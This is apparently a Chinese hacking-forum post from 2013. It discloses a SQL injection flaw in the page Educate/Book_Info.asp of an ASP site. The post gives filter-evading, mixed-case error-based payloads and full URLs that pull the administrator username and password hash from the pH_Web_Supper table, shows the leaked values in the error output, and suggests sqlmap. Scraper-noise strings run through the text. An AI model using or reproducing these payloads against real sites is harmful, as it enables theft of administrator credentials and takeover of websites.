漏洞出现在Educate/Book_Info.asp 8 V- g. ]/ u4 u3 D2 z& d! s; F
. T7 N- p" O5 R* a( s
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出# _+ r& Z O+ s7 ] _; z1 x
1 Y* n/ R) c' V p- Iexp:如下4 ^+ Q8 I9 ?/ {: @5 c
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
3 U$ ~7 v* T5 O5 ~6 n$ B0 d查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
8 }- P0 I ?/ } & _4 Y* x0 O* X p& {! a8 G* v
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
: |7 w4 r8 R% B5 a
9 m8 {" c# i* x! jMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
$ B% j/ m3 ~+ K: A1 `9 ]
1 ]6 Q! l7 Z( I% q% ^1 s$ b将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
. e( p3 D! x9 K: Z( u, b0 h" k 6 E. V& ]8 b" A$ X
/Educate/Book_Info.asp,行 8 \2 M2 d. v) f; a! o1 ~
# p B& V0 ?6 W2 _. v, L0 {
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
9 w m' d9 \$ c# _
r% U$ K# a2 X/ k+ ]5 B3 \$ Q; PMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
* m; }* {+ D% V- e) w , j" E4 s/ ?, W" ^! R3 S( @
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。% I4 t) S; N0 |* R! i W
! }+ O9 Y7 @+ f5 i+ ]9 m. q+ H, D
/Educate/Book_Info.asp,行 8
, ~: Y0 G- B- r g3 P7 M( d F" n% C |
发表于 2013-2-16 21:44:16
收藏
支持
反对